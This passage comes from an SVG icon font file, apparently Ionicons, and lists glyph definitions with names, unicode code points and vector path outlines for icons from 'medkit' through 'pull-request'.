d="M441 311c4 -3 7 -8 7 -14v-281c0 -6 -2 -11 -7 -14c-2 -1 -5 -2 -7 -2c-3 0 -6 0 -8 2l-97 66l-97 -66c-5 -3 -10 -3 -15 0l-97 66l-97 -66c-5 -3 -10 -3 -15 0s-8 8 -8 14v281c0 6 3 11 7 14l105 71c5 3 10 3 15 0l97 -66l98 66c5 3 10 3 15 0zM103 95v242l-71 -50v-242
zM135 95l73 -49v129l-4 -11c-7 2 -13 6 -20 10l8 13c5 -3 11 -6 16 -8v109l-73 49v-101c4 -2 9 -4 13 -7l-10 -13c-1 1 -2 1 -3 2v-123zM240 46l73 49v109c0 -1 -1 -1 -1 -2l-6 -6l-12 11l6 6c3 3 5 7 8 10l5 -5v119l-73 -49v-112h7l3 -15c-3 0 -6 -1 -9 -1h-1v-114zM416 46
v242l-71 49v-88c3 1 5 1 8 2l4 -16c-4 -1 -8 -1 -12 -3v-137zM97 227c-3 -1 -11 -5 -14 -7l-11 12c4 3 8 6 12 8c3 2 6 3 9 4l5 -15c-2 -1 1 -1 -1 -2zM265 182c5 3 10 5 15 10l11 -12c-6 -6 -12 -10 -19 -13zM67 192v-1l-15 5v1c2 7 4 13 9 20l13 -9c-4 -5 -5 -10 -7 -16z
M166 210c3 -4 7 -8 11 -11l-11 -12c-4 4 -8 9 -12 13l-3 3l12 11c1 -1 2 -3 3 -4zM376 218l-11 12l10 10l-10 10l11 12l10 -11l11 11l11 -12l-10 -10l10 -10l-11 -12l-11 11z" />
    <glyph glyph-name="ion-medkit" unicode="&#xf2a2;" 
d="M440 304c4 0 8 -4 8 -8v-288c0 -4 -4 -8 -8 -8h-432c-4 0 -8 4 -8 8v288c0 4 4 8 8 8h120v31c1 28 22 49 51 49h45h45c30 0 50 -21 51 -49v-31h120zM160 331v-27h128v27v1v1c0 10 -9 19 -19 19h-45h-45c-10 0 -19 -9 -19 -19v-1v-1zM320 128v64h-64v64h-64v-64h-64v-64
h64v-64h64v64h64z" />
    <glyph glyph-name="ion-merge" unicode="&#xf33f;" horiz-adv-x="384" 
d="M320 224c35 0 64 -29 64 -64s-29 -64 -64 -64c-24 0 -44 13 -55 32h-10c-61 0 -115 25 -159 74v-115c19 -11 32 -31 32 -55c0 -35 -29 -64 -64 -64s-64 29 -64 64c0 24 13 44 32 55v210c-19 11 -32 31 -32 55c0 35 29 64 64 64s64 -29 64 -64c0 -19 -8 -37 -22 -49
c4 -9 17 -35 37 -58c32 -35 70 -53 112 -53h10c11 19 31 32 55 32zM64 384c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM64 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM320 128c18 0 32 14 32 32s-14 32 -32 32
s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-mic-a" unicode="&#xf204;" horiz-adv-x="288" 
d="M0 210c0 10 9 19 20 19s19 -9 19 -19v-14c0 -28 12 -53 31 -72s45 -31 74 -31s55 12 74 31s31 44 31 72v14c0 10 8 19 19 19s20 -9 20 -19v-14c0 -66 -46 -120 -108 -136c-1 0 -3 -1 -4 -1c-6 -2 -10 -7 -12 -13v-58c0 -11 -9 -20 -20 -20v0c-11 0 -20 9 -20 20v58
c-2 6 -6 11 -12 13c-1 0 -3 1 -4 1c-62 16 -108 70 -108 136v14zM67 340c0 42 34 76 77 76s78 -34 78 -76v-144c0 -42 -35 -75 -78 -75s-77 33 -77 75v144z" />
    <glyph glyph-name="ion-mic-b" unicode="&#xf205;" horiz-adv-x="160" 
d="M80 416c35 0 65 -23 76 -59c6 -18 4 -45 2 -55s-8 -20 -14 -28c-3 -4 -7 -7 -11 -9c-1 0 -1 -1 -2 -1c-3 -1 -6 -2 -10 -3c-12 -3 -25 -5 -39 -5v0h-1h-1v0c-14 0 -29 2 -41 5c-4 1 -7 2 -10 3c-1 0 -1 1 -2 1c-4 2 -8 5 -11 9c-6 8 -12 18 -14 28s-4 37 2 55
c11 36 41 59 76 59zM119 247c6 0 12 -5 12 -12v-2c-5 -67 -18 -241 -19 -252c0 0 -3 -13 -32 -13v0c-29 0 -32 13 -32 13c-1 11 -13 185 -18 252v2c0 7 5 12 11 12h1c1 0 1 -1 2 -1c2 0 4 -1 6 -1c9 -2 21 -2 31 -2s20 0 29 2c2 0 4 1 6 1c1 0 1 1 2 1h1zM90 166v33
c0 6 -4 11 -10 11s-10 -5 -10 -11v-33c0 -6 4 -11 10 -11s10 5 10 11z" />
    <glyph glyph-name="ion-mic-c" unicode="&#xf206;" horiz-adv-x="256" 
d="M201 416c30 0 55 -23 55 -52v-28h-59v-37h59v-43h-59v-37h59v-43h-59v-37h59v-42c0 -29 -25 -52 -55 -52h-30v-77h-86v77h-30c-30 0 -55 23 -55 52v42h152v37h-152v43h152v37h-152v43h152v37h-152v28c0 29 25 52 55 52h146z" />
    <glyph glyph-name="ion-minus-circled" unicode="&#xf207;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM352 176v32h-256v-32h256z" />
    <glyph glyph-name="ion-minus-round" unicode="&#xf208;" horiz-adv-x="384" 
d="M353 224c17 0 31 -14 31 -32s-14 -32 -31 -32h-322c-17 0 -31 14 -31 32s14 32 31 32h322z" />
    <glyph glyph-name="ion-minus" unicode="&#xf209;" horiz-adv-x="384" 
d="M0 160v64h384v-64h-384z" />
    <glyph glyph-name="ion-model-s" unicode="&#xf2c1;" horiz-adv-x="512" 
d="M509 57v-8v0v-1v-3v0c0 -3 -1 -5 -1 -7c-1 -12 -2 -18 -6 -20c-3 -2 -6 -2 -10 -2h-43s-10 1 -11 16v8c20 1 39 1 52 0c10 0 13 0 16 6c2 3 2 7 3 11zM3 57c1 -4 1 -8 3 -11c3 -6 6 -6 16 -6c13 1 32 1 52 0v-8c-1 -15 -8 -16 -11 -16h-43s-7 0 -10 2c-4 2 -6 8 -7 20v7
v0v3v1v0v8zM512 151c0 -31 -2 -58 -2 -68c0 -4 0 -11 -1 -18c-1 -4 -1 -8 -3 -11c-3 -6 -6 -6 -16 -6c-13 1 -32 1 -52 0c-13 0 -27 -2 -39 -2c-30 -1 -21 4 -34 4s-63 -2 -109 -2s-97 2 -110 2s-4 -5 -34 -4c-12 0 -25 2 -38 2c-20 1 -39 1 -52 0c-10 0 -13 0 -16 6
c-2 3 -2 7 -3 11c-1 7 -1 14 -1 18c0 10 -2 37 -2 68s4 61 6 64c1 2 8 9 26 21s17 10 20 18c-3 1 -5 3 -7 3c-4 0 -4 -3 -12 -3s-24 1 -28 5c-4 3 -5 5 -5 8s2 9 5 13s19 6 27 7s10 0 12 -1c4 -2 3 -22 3 -22l9 -1c5 13 12 41 24 62c13 23 26 30 32 32s10 2 48 6s69 5 96 5
s58 -1 96 -5s42 -4 48 -6s19 -9 32 -32c12 -21 19 -49 24 -62l9 1s-1 20 3 22c2 1 4 2 12 1s24 -3 27 -7s5 -10 5 -13s-1 -4 -5 -8s-20 -5 -28 -5s-8 3 -12 3c-2 0 -4 -2 -7 -3c3 -8 2 -6 20 -18s25 -19 26 -21c2 -3 6 -33 6 -64zM86 303c-5 -11 -11 -33 -10 -36
s-1 -5 15 -4s117 3 165 3s149 -2 165 -3s14 1 15 4s-5 25 -10 36s-17 31 -26 37c-2 1 -17 7 -54 9c-34 2 -72 3 -90 3s-56 -1 -90 -3c-37 -2 -52 -8 -54 -9c-7 -4 -21 -26 -26 -37zM123 178c7 2 11 2 11 2s-17 16 -48 25s-49 11 -66 10c0 0 -3 -16 0 -27s8 -10 16 -12
s13 -5 16 -4s7 4 12 4s29 -4 38 -4s14 4 21 6zM358 99c15 2 34 19 21 33c-18 19 -15 19 -55 24c-35 4 -61 4 -68 4s-33 0 -68 -4c-40 -5 -37 -5 -55 -24c-13 -14 6 -31 21 -33c14 -2 74 -3 102 -3s88 1 102 3zM492 188c3 11 0 27 0 27c-17 1 -35 -1 -66 -10s-48 -26 -48 -26
s4 1 11 -1s12 -6 21 -6s33 4 38 4s9 -3 12 -4s8 2 16 4s13 1 16 12z" />
    <glyph glyph-name="ion-monitor" unicode="&#xf20a;" 
d="M437 384c6 0 11 -5 11 -11v-266c0 -6 -5 -11 -11 -11h-426c-6 0 -11 5 -11 11v266c0 6 5 11 11 11h426zM416 128v224h-384v-224h384zM270 0h-92c-28 0 -42 3 -30 12s30 16 30 23c0 4 1 45 1 45h45h45s1 -41 1 -45c0 -7 18 -14 30 -23s-2 -12 -30 -12z" />
    <glyph glyph-name="ion-more" unicode="&#xf20b;" horiz-adv-x="384" 
d="M50 144c-28 0 -50 21 -50 48c0 26 22 48 50 48s50 -22 50 -48c0 -27 -22 -48 -50 -48zM192 144c-28 0 -50 21 -50 48c0 26 22 48 50 48s50 -22 50 -48c0 -27 -22 -48 -50 -48zM334 144c-28 0 -50 21 -50 48c0 26 22 48 50 48s50 -22 50 -48c0 -27 -22 -48 -50 -48z" />
    <glyph glyph-name="ion-mouse" unicode="&#xf340;" horiz-adv-x="256" 
d="M128 416h-1h5h-4zM251 255c2 1 2 1 4 1h1v-176c0 -37 -21 -71 -53 -91c-5 -3 -9 -5 -14 -7v-1v0c-18 -9 -39 -13 -61 -13c-71 0 -128 50 -128 112v176h1c2 0 3 0 5 -1v0c34 -13 76 -23 122 -23s88 10 122 23h1zM189 -18c5 2 10 4 14 7c-5 -3 -9 -5 -14 -7v0v-1v1v0z
M203 -11c-4 -3 -9 -5 -14 -7c5 2 9 4 14 7zM132 416c69 -2 124 -51 124 -112v-23c-2 -2 -4 -4 -6 -5c-1 -1 -3 0 -4 -1c-23 -10 -50 -16 -82 -19h-1h-2c-11 0 -17 0 -17 10v86c0 9 -7 16 -16 16s-16 -7 -16 -16v-85c0 -11 -6 -11 -17 -11h-2c-32 3 -61 9 -84 19v0
c-1 0 -1 1 -2 1c-3 1 -5 3 -7 5v23c0 61 57 111 127 112h5z" />
    <glyph glyph-name="ion-music-note" unicode="&#xf20c;" horiz-adv-x="384" 
d="M362 416c12 0 22 -9 22 -21v-303s-3 -43 -12 -55v0c-9 -15 -25 -21 -43 -21h-37c-28 0 -52 20 -52 48s24 48 52 48h60v192l-208 -38v-232c0 -8 -3 -27 -13 -41c-1 -2 -2 -3 -3 -5c0 -1 -1 -1 -2 -2v0c-9 -11 -23 -18 -38 -18h-37c-28 0 -51 20 -51 48s23 48 51 48v0h61
v286c1 14 13 28 27 32l218 33s3 1 5 1z" />
    <glyph glyph-name="ion-navicon-round" unicode="&#xf20d;" horiz-adv-x="384" 
d="M353 224c17 0 31 -14 31 -32s-14 -32 -31 -32h-322c-17 0 -31 14 -31 32s14 32 31 32h322zM353 352c17 0 31 -14 31 -32s-14 -32 -31 -32h-322c-17 0 -31 14 -31 32s14 32 31 32h322zM353 96c17 0 31 -14 31 -32s-14 -32 -31 -32h-322c-17 0 -31 14 -31 32s14 32 31 32
h322z" />
    <glyph glyph-name="ion-navicon" unicode="&#xf20e;" horiz-adv-x="320" 
d="M0 175v32h320v-32h-320zM0 271v32h320v-32h-320zM0 79v32h320v-32h-320z" />
    <glyph glyph-name="ion-navigate" unicode="&#xf2a3;" 
d="M448 416l-192 -448v256h-256z" />
    <glyph glyph-name="ion-network" unicode="&#xf341;" horiz-adv-x="384" 
d="M384 352c0 -24 -13 -44 -32 -55v-93l-128 -64v-53c19 -11 32 -31 32 -55c0 -35 -29 -64 -64 -64s-64 29 -64 64c0 24 13 44 32 55v53l-128 64v93c-19 11 -32 31 -32 55c0 35 29 64 64 64s64 -29 64 -64c0 -24 -13 -44 -32 -55v-53l96 -48l96 48v53c-19 11 -32 31 -32 55
c0 35 29 64 64 64s64 -29 64 -64zM64 384c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM192 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM320 320c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-no-smoking" unicode="&#xf2c2;" 
d="M328 144v48h16v-48h-16zM80 144v48h90l48 -48h-138zM332 388c69 -38 116 -112 116 -196c0 -124 -100 -224 -224 -224c-24 0 -47 4 -68 11c-2 1 -3 1 -5 2c-12 4 -24 9 -35 15h-1c-69 38 -115 112 -115 196c0 124 100 224 224 224c24 0 47 -4 68 -11c2 -1 3 -1 5 -2
c12 -4 24 -9 35 -15v0zM224 22c37 0 72 12 100 32l-238 238c-20 -28 -32 -63 -32 -100c0 -65 36 -121 90 -150c6 -3 13 -7 19 -9c2 -1 3 -1 5 -2c9 -3 19 -5 29 -7c9 -2 18 -2 27 -2zM362 93c20 28 32 62 32 99c0 66 -37 123 -91 151c-6 3 -12 6 -18 8c-2 1 -3 1 -5 2
c-9 3 -19 5 -29 7c-9 2 -18 2 -27 2c-37 0 -71 -12 -99 -32zM320 150l-42 42h42v-42zM352 144v48h16v-48h-16zM328 235c16 -7 16 -27 16 -34v-1h-16v1c0 8 -1 17 -7 20c-4 2 -13 4 -39 4h-3c-13 0 -24 0 -33 13c-5 8 -5 19 -2 29c-4 1 -8 1 -12 3c-17 7 -26 20 -26 38
c0 33 27 44 39 44v-16c-1 0 -23 -2 -23 -28c0 -11 5 -19 16 -23c9 -4 18 -3 18 -3c3 0 6 -2 7 -5s2 -6 0 -8c-5 -7 -7 -18 -4 -22c4 -6 7 -6 20 -6h3c24 0 37 -2 46 -6zM368 200v0h-16c0 28 -4 41 -7 46c-6 10 -14 14 -25 14h-30c-3 0 -5 2 -6 4s-1 6 0 8c0 0 8 18 6 32
c-1 8 -6 17 -27 17v16c24 0 40 -11 43 -30c2 -11 0 -23 -3 -31h17c16 0 30 -8 39 -22c6 -10 9 -28 9 -54z" />
    <glyph glyph-name="ion-nuclear" unicode="&#xf2a4;" 
d="M176 176c0 32 16 48 48 48s48 -16 48 -48s-16 -48 -48 -48s-48 16 -48 48zM176 176c0 32 16 48 48 48s48 -16 48 -48s-16 -48 -48 -48s-48 16 -48 48zM448 176c0 -27 -5 -53 -15 -78s-23 -47 -40 -66s-36 -35 -59 -48l-79 136c22 12 33 31 33 56h160zM224 240
c-12 0 -23 -3 -33 -9l-80 138c35 20 73 31 113 31s78 -10 113 -30l-81 -139c-10 6 -21 9 -32 9zM160 176c0 -25 11 -44 33 -56l-79 -136c-35 20 -62 46 -83 80s-31 71 -31 112h160z" />
    <glyph glyph-name="ion-outlet" unicode="&#xf342;" 
d="M338 416c61 0 110 -51 110 -113v-222c0 -62 -49 -113 -110 -113h-228c-61 0 -110 51 -110 113v222c0 62 49 113 110 113h228zM143 197v102c0 11 -9 21 -20 21h-23c-11 0 -19 -9 -20 -20v-2v-101v-1c0 -11 9 -20 20 -20h23c11 0 20 9 20 20v1zM265 52v29
c0 23 -18 42 -41 42s-41 -19 -41 -42v-29v0c0 -11 9 -20 20 -20h21h21c11 0 20 7 20 18v2zM368 197v102c0 11 -9 21 -20 21h-24c-11 0 -19 -9 -20 -20v-2v-101v-1c0 -11 9 -20 20 -20h24c11 0 20 9 20 20v1z" />
    <glyph glyph-name="ion-paintbrush" unicode="&#xf4d5;" 
d="M118 165c52 0 102 -41 90 -102c-11 -52 -54 -71 -90 -77c-30 -5 -100 0 -118 35c24 9 34 26 34 49c0 49 32 95 84 95zM436 388c13 -13 17 -30 5 -45l-154 -175c2 -9 1 -17 -3 -23l-50 -58v0v0c-2 -2 -4 -2 -6 0c-1 1 -1 2 -1 3v1c2 53 -41 87 -89 90v0h-2s-2 0 -2 1
c-2 2 -2 4 0 6l59 49c6 4 14 4 23 2l175 154c15 12 32 8 45 -5zM134 188v0v0v0z" />
    <glyph glyph-name="ion-paintbucket" unicode="&#xf4d6;" horiz-adv-x="480" 
d="M112 384l32 32l275 -276l-58 -12l-163 -160l-198 192l152 152zM309 160l-110 110l-110 -110h220zM419 140c0 0 61 -66 61 -99s-27 -60 -61 -60s-60 27 -60 60s60 99 60 99z" />
    <glyph glyph-name="ion-paper-airplane" unicode="&#xf2c3;" 
d="M0 176l448 240l-112 -448l-112 112l-80 -112l-16 160zM319 31l80 323l-322 -173l83 -31l192 154l-128 -176z" />
    <glyph glyph-name="ion-paperclip" unicode="&#xf20f;" horiz-adv-x="160" 
d="M149 293c6 0 11 -5 11 -12v-195c0 -28 -10 -49 -24 -63c-15 -15 -36 -23 -56 -23c-40 0 -80 31 -80 88v234c0 24 11 44 29 54s39 11 57 0s29 -30 29 -54l-1 -225c0 -13 -3 -24 -9 -32s-16 -12 -25 -12c-17 0 -34 15 -34 44v173c0 6 6 12 12 12s11 -6 11 -12v-173
c0 -14 5 -21 11 -21c2 0 5 2 7 4c3 4 5 10 5 17v225c0 15 -6 28 -17 34s-24 6 -35 0s-17 -19 -17 -34v-234c0 -44 29 -64 57 -64s57 19 57 63v195c0 6 6 11 12 11z" />
    <glyph glyph-name="ion-pause" unicode="&#xf210;" horiz-adv-x="256" 
d="M96 12c0 -7 -5 -12 -12 -12h-72c-7 0 -12 5 -12 12v360c0 7 5 12 12 12h72c7 0 12 -5 12 -12v-360zM244 384c7 0 12 -5 12 -12v-360c0 -7 -5 -12 -12 -12h-72c-7 0 -12 5 -12 12v360c0 7 5 12 12 12h72z" />
    <glyph glyph-name="ion-person-add" unicode="&#xf211;" 
d="M397 120h-42v51h-51v42h51v51h42v-51h51v-42h-51v-51zM384 0h-192h-192s0 26 2 40c2 11 17 25 81 49c63 23 60 12 60 55c0 28 -14 11 -23 64c-4 21 -6 7 -14 40c-4 17 3 19 2 27s-2 16 -4 33c-2 21 18 76 88 76s90 -55 88 -76c-2 -17 -3 -25 -4 -33s6 -10 2 -27
c-8 -33 -10 -19 -14 -40c-9 -53 -23 -36 -23 -64c0 -43 -3 -32 60 -55c64 -24 79 -38 81 -49c2 -14 2 -40 2 -40z" />
    <glyph glyph-name="ion-person-stalker" unicode="&#xf212;" 
d="M393 123c42 -16 52 -26 53 -33c2 -9 2 -90 2 -90h-98c0 18 0 71 -1 77c-1 10 -1 29 -55 50c-8 3 -14 5 -19 7c18 8 15 15 15 28c0 19 -9 11 -15 47c-2 14 -4 5 -9 28c-3 12 1 12 1 18s-1 10 -2 22c-1 14 11 52 57 52s59 -38 58 -52c-1 -12 -2 -16 -2 -22
c-1 -6 4 -6 1 -18c-5 -23 -7 -14 -9 -28c-6 -36 -16 -28 -16 -47c0 -29 -2 -23 39 -39zM325 0h-163h-162s0 65 2 77c2 10 15 22 69 43c54 20 50 17 50 55c0 24 -12 8 -20 54c-3 18 -5 7 -11 36c-3 15 2 16 1 23s-2 14 -3 29c-2 19 15 67 74 67s77 -49 75 -67
c-1 -15 -2 -22 -3 -29s5 -8 2 -23c-6 -29 -9 -18 -12 -36c-8 -46 -20 -30 -20 -54c0 -32 -2 -36 31 -48c6 -2 11 -4 19 -7c54 -21 67 -33 69 -43c1 -6 2 -28 2 -47v-30z" />
    <glyph glyph-name="ion-person" unicode="&#xf213;" horiz-adv-x="384" 
d="M384 0h-192h-192s0 26 2 40c2 11 17 25 81 49c63 23 60 12 60 55c0 28 -14 11 -23 64c-4 21 -6 7 -14 40c-4 17 3 19 2 27s-2 16 -4 33c-2 21 18 76 88 76s90 -55 88 -76c-2 -17 -3 -25 -4 -33s6 -10 2 -27c-8 -33 -10 -19 -14 -40c-9 -53 -23 -36 -23 -64
c0 -43 -3 -32 60 -55c64 -24 79 -38 81 -49c2 -14 2 -40 2 -40z" />
    <glyph glyph-name="ion-pie-graph" unicode="&#xf2a5;" 
d="M1 192c0 5 -1 11 -1 16c0 115 93 208 208 208c5 0 11 -1 16 -1v-32v-191h-191h-32zM78 46c-26 32 -42 71 -45 114h223v223c43 -3 82 -19 114 -45c47 -38 78 -96 78 -162c0 -115 -93 -208 -208 -208c-66 0 -124 31 -162 78z" />
    <glyph glyph-name="ion-pin" unicode="&#xf2a6;" horiz-adv-x="224" 
d="M188 220c20 -10 36 -31 36 -55c0 -17 -3 -21 -15 -21h-81l-12 -176h-8l-12 176h-81c-12 0 -15 5 -15 21c0 24 16 45 36 55v0c1 0 3 1 4 2c7 4 12 11 14 19l18 118v5c0 7 -4 10 -10 13v0c-1 0 -1 1 -2 1c-7 3 -12 9 -12 17c0 20 6 21 18 21h92c12 0 18 -1 18 -21
c0 -8 -5 -14 -12 -17c-1 0 -1 -1 -2 -1v0c-6 -3 -10 -6 -10 -13v-5l18 -118c2 -8 7 -15 14 -19c1 -1 3 -2 4 -2v0z" />
    <glyph glyph-name="ion-pinpoint" unicode="&#xf2a7;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c32 32 51 75 55 120l-63 8v16l63 8c-4 45 -23 88 -55 120s-75 51 -120 55l-8 -63h-16l-8 63c-45 -4 -88 -23 -120 -55s-51 -75 -55 -120l63 -8v-16l-63 -8
c4 -45 23 -88 55 -120s75 -51 120 -55l8 63h16l8 -63c45 4 88 23 120 55z" />
    <glyph glyph-name="ion-pizza" unicode="&#xf2a8;" horiz-adv-x="352" 
d="M315 318c10 -4 12 -13 9 -20l-148 -330s-143 320 -148 331s2 16 9 19c39 18 90 28 139 28s96 -9 139 -28zM112 256c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM176 109c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM240 224
c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM342 382c6 -3 10 -6 10 -13c0 -1 0 -3 -1 -5l-8 -19c-3 -5 -8 -9 -14 -9c-1 0 -3 1 -6 2c-41 18 -95 30 -147 30s-102 -11 -147 -30c-3 -1 -4 -2 -6 -2c-6 0 -11 4 -14 9l-8 19s-1 2 -1 5c0 8 6 12 10 14
c49 21 107 33 166 33s118 -13 166 -34z" />
    <glyph glyph-name="ion-plane" unicode="&#xf214;" 
d="M250 136c0 -7 1 -69 -6 -102c-1 -4 3 -4 5 -7l51 -33c2 -2 3 -8 3 -8l1 -18l-68 16l-12 -32l-12 32l-68 -16l1 18s0 6 2 8l52 33c2 3 6 3 5 7c-7 33 -6 95 -6 102s-8 5 -8 5l-62 -13l-128 -49c0 23 2 26 9 31l183 131s5 63 5 113c0 24 12 78 27 78s27 -54 27 -78
c0 -53 5 -113 5 -113l183 -131c6 -4 9 -7 9 -31l-128 49l-62 13s-8 2 -8 -5z" />
    <glyph glyph-name="ion-planet" unicode="&#xf343;" horiz-adv-x="512" 
d="M96 182c39 -24 85 -48 134 -69c44 -19 87 -35 126 -46c-27 -22 -62 -35 -100 -35c-85 0 -155 66 -160 150zM107 251c1 4 3 8 5 11c10 21 26 40 44 55c27 22 62 35 100 35c85 0 155 -66 160 -150v-10c0 -21 -4 -41 -11 -59c-1 -4 -3 -8 -5 -11c-6 1 -13 3 -19 5
c-39 11 -82 26 -126 45c-56 24 -108 52 -148 79zM430 163c57 -35 87 -62 81 -82c-4 -12 -19 -17 -44 -17c-50 0 -136 23 -231 64c-141 61 -246 140 -235 175c4 12 20 20 44 17c22 -3 47 -9 73 -18c-8 -9 -8 -12 -14 -22c-23 5 -44 8 -59 8h-6c2 -2 5 -6 8 -9
c11 -11 27 -24 46 -37c41 -29 97 -59 156 -85c44 -19 89 -35 128 -46c36 -10 68 -15 90 -15h6c-2 2 -5 6 -8 9c-10 10 -24 22 -41 34c4 11 5 12 6 24z" />
    <glyph glyph-name="ion-play" unicode="&#xf215;" horiz-adv-x="320" 
d="M309 215c7 -6 11 -14 11 -23s-4 -17 -11 -23l-278 -166c-4 -2 -7 -3 -11 -3c-11 0 -20 9 -20 20v0v344v0c0 11 9 20 20 20c4 0 8 -1 11 -3z" />
    <glyph glyph-name="ion-playstation" unicode="&#xf30a;" horiz-adv-x="512" 
d="M400 245c0 -11 0 -22 -2 -33c-2 -10 -5 -20 -10 -28c-4 -7 -10 -13 -18 -17c-7 -4 -16 -6 -24 -6c-13 0 -31 4 -42 9v131v2c0 9 -7 17 -15 17h-1c-9 0 -16 -8 -16 -17v-3v-300l-80 26v358s28 -4 75 -18s67 -21 84 -31c8 -5 15 -11 21 -17c7 -7 13 -14 17 -23
c8 -16 10 -33 11 -50zM87 90c-4 -2 -8 -3 -11 -6c-1 -1 -3 -3 -2 -5s4 -4 6 -5c6 -2 13 -3 19 -3c7 0 15 0 22 2c5 1 9 3 14 5c30 10 41 12 41 12v-42c-14 -2 -36 -4 -50 -4c-30 -1 -60 4 -88 13c-9 3 -19 6 -27 12c-4 3 -8 8 -10 13c-2 4 -1 9 1 13s5 8 9 11
c9 6 18 10 28 14c8 4 17 7 26 10c35 12 111 37 111 37v-47s-62 -20 -89 -30zM512 102c0 -5 -2 -9 -5 -13c-6 -7 -14 -11 -22 -15s-17 -8 -26 -11c-54 -19 -171 -59 -171 -59v48s92 30 133 44c6 2 11 4 16 8c2 2 4 3 3 6c-1 2 -4 4 -6 5c-6 2 -13 3 -19 3
c-10 0 -20 -2 -30 -5c-29 -10 -97 -32 -97 -32v49s45 14 67 16c8 1 23 1 31 1c26 0 54 -3 79 -11c5 -2 8 -3 14 -5c9 -3 18 -8 25 -14c4 -4 8 -9 8 -15z" />
    <glyph glyph-name="ion-plus-circled" unicode="&#xf216;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM352 176v32h-112v112h-32v-112h-112v-32h112v-112h32v112h112z" />
    <glyph glyph-name="ion-plus-round" unicode="&#xf217;" horiz-adv-x="384" 
d="M353 224c17 0 31 -14 31 -32s-14 -32 -31 -32h-129v-129c0 -17 -14 -31 -32 -31s-32 14 -32 31v129h-129c-17 0 -31 14 -31 32s14 32 31 32h129v129c0 17 14 31 32 31s32 -14 32 -31v-129h129z" />
    <glyph glyph-name="ion-plus" unicode="&#xf218;" horiz-adv-x="384" 
d="M384 224v-64h-160v-160h-64v160h-160v64h160v160h64v-160h160z" />
    <glyph glyph-name="ion-podium" unicode="&#xf344;" 
d="M0 0v192h128v-192h-128zM160 0v288h128v-288h-128zM320 0v128h128v-128h-128z" />
    <glyph glyph-name="ion-pound" unicode="&#xf219;" 
d="M93 96h-93v54h101l13 84h-99v54h107l22 128h64l-22 -128h106l22 128h63l-22 -128h93v-54h-102l-12 -84h99v-54h-107l-22 -128h-63l22 128h-107l-22 -128h-63zM177 234l-12 -84h106l12 84h-106v0z" />
    <glyph glyph-name="ion-power" unicode="&#xf2a9;" 
d="M224 192c-18 0 -32 14 -32 32v160c0 18 14 32 32 32s32 -14 32 -32v-160c0 -18 -14 -32 -32 -32zM347 379c61 -40 101 -109 101 -187c0 -124 -100 -224 -224 -224s-224 100 -224 224c0 78 40 147 101 187v0c5 3 11 5 17 5c18 0 32 -14 32 -32c0 -6 -2 -12 -5 -17
c-2 -3 -4 -6 -7 -8c-1 -1 -3 -2 -4 -3c-8 -6 -16 -12 -23 -19c-30 -30 -47 -70 -47 -113s17 -83 47 -113s70 -47 113 -47s83 17 113 47s47 70 47 113s-17 83 -47 113c-7 7 -15 13 -23 19c-1 1 -3 2 -4 3c-3 2 -5 5 -7 8c-3 5 -5 11 -5 17c0 18 14 32 32 32c6 0 12 -2 17 -5
v0z" />
    <glyph glyph-name="ion-pricetag" unicode="&#xf2aa;" 
d="M439 187c12 -12 12 -31 0 -43l-165 -167c-11 -11 -30 -11 -42 -1l-3 3l-206 209l-6 5c-6 7 -9 15 -10 24v0v2v0l-7 98v4v0c0 12 4 24 13 33l49 49c8 9 20 13 31 13h4l100 -4v0c12 0 22 -4 30 -12v0l2 -2v0l210 -211v0v0zM112 256c26 0 48 22 48 48s-22 48 -48 48
s-48 -22 -48 -48s22 -48 48 -48z" />
    <glyph glyph-name="ion-pricetags" unicode="&#xf2ab;" 
d="M440 209c10 -11 11 -28 0 -39l-29 -29c11 11 10 28 0 39v0v0l-190 191v0l-1 1h-1c-8 7 -16 12 -27 12v0l-90 3h-4c-9 0 -19 -3 -26 -10l28 27c8 8 17 12 27 12h4l90 -4v0c11 0 19 -4 27 -11h1l1 -1v0l190 -191v0v0zM396 166v0c11 -11 11 -29 0 -40l-108 -109v1l-26 -27
l-2 -2l-13 -13c-10 -10 -26 -10 -37 -1l-3 3l-186 188l-5 5c-5 6 -9 14 -10 22v0v2v0l-6 88v3v1c0 11 4 21 12 29l44 45l1 1l1 1c7 6 17 9 26 9h4l90 -3v0c11 0 19 -4 27 -11v0l2 -1v0l189 -191v0zM79 308c-12 -8 -21 -21 -21 -37c0 -24 19 -43 43 -43c16 0 29 9 37 21
c4 7 7 14 7 22c0 24 -20 44 -44 44c-8 0 -15 -3 -22 -7z" />
    <glyph glyph-name="ion-printer" unicode="&#xf21a;" 
d="M392 320c28 0 56 -19 56 -55v-131c0 -31 -28 -54 -56 -54h-40v-112h-8h-8h-224h-11h-5v112h-40c-28 0 -56 24 -56 62v123c0 38 28 55 56 55h40v64h256v-64h40zM336 -16v176h-224v-176h224zM336 320v48h-224v-48h224zM384 256v16h-17v-16h17zM128 112v16h192v-16h-192z
M128 64v16h192v-16h-192zM128 16v16h192v-16h-192z" />
    <glyph glyph-name="ion-pull-request" unicode="&#xf345;" horiz-adv-x="384" 
d="M64 384c35 0 64 -29 64 -64c0 -24 -13 -44 -32 -55v-178c19 -11 32 -31 32 -55c0 -35 -29 -64 -64 -64s-64 29 -64 64c0 24 13 44 32 55v178c-19 11 -32 31 -32 55c0 35 29 64 64 64zM64 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM64 288
